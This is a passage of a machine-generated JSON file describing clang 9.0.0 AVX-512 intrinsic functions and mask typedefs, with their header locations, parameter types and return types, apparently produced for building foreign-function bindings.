false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtepi32_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7555:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvtepi32_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7562:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtepi32_storeu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7571:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_cvtepi32_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7577:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtepi32_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7586:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_maskz_cvtepi32_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7593:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtepi32_storeu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7601:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_cvtepi32_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7607:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtepi32_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7615:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvtepi32_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7622:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtepi32_storeu_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7630:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_cvtepi32_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7636:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtepi32_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7642:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_maskz_cvtepi32_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7649:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtepi32_storeu_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7657:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_cvtepi64_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7663:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtepi64_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7671:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvtepi64_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7678:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtepi64_storeu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7686:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_cvtepi64_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7692:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtepi64_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7700:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_maskz_cvtepi64_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7707:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtepi64_storeu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7715:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_cvtepi64_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7721:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtepi64_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7728:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvtepi64_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7735:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtepi64_storeu_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7743:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_cvtepi64_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7749:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtepi64_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7755:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_maskz_cvtepi64_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7763:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtepi64_storeu_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7771:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_cvtepi64_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7777:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtepi64_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7785:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvtepi64_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7793:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtepi64_storeu_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7801:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_cvtepi64_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7807:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtepi64_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7815:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_maskz_cvtepi64_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7822:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtepi64_storeu_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7830:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_permutexvar_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:8094:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_mask_permutexvar_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:8100:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_maskz_permutexvar_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:8109:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_permutexvar_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:8117:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_permutexvar_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:8123:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_permutexvar_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:8131:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_permutexvar_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:8142:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_permutexvar_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:8150:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_mask_permutexvar_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:8160:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_permutexvar_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:8169:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_movehdup_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:8233:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_movehdup_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:8241:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_mask_movehdup_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:8249:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_movehdup_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:8257:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm_mask_moveldup_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:8265:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_moveldup_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:8273:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_mask_moveldup_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:8281:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_moveldup_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:8289:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm_mask_mov_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:8317:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_mov_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:8325:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_mask_mov_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:8333:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_maskz_mov_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:8341:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_mask_mov_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:8349:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_mov_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:8357:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_mask_mov_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:8365:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_mov_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:8373:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm_mask_cvtph_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:8381:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_cvtph_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:8389:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_mask_cvtph_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:8398:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_cvtph_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:8406:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256" } }, { "tag": "typedef", "ns": 0, "name": "__mmask32", "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:17:22", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "typedef", "ns": 0, "name": "__mmask64", "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:18:28", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_knot_mask32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:25:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }], "return-type": { "tag": "__mmask32" } }, { "tag": "function", "name": "_knot_mask64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:31:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask64" } }], "return-type": { "tag": "__mmask64" } 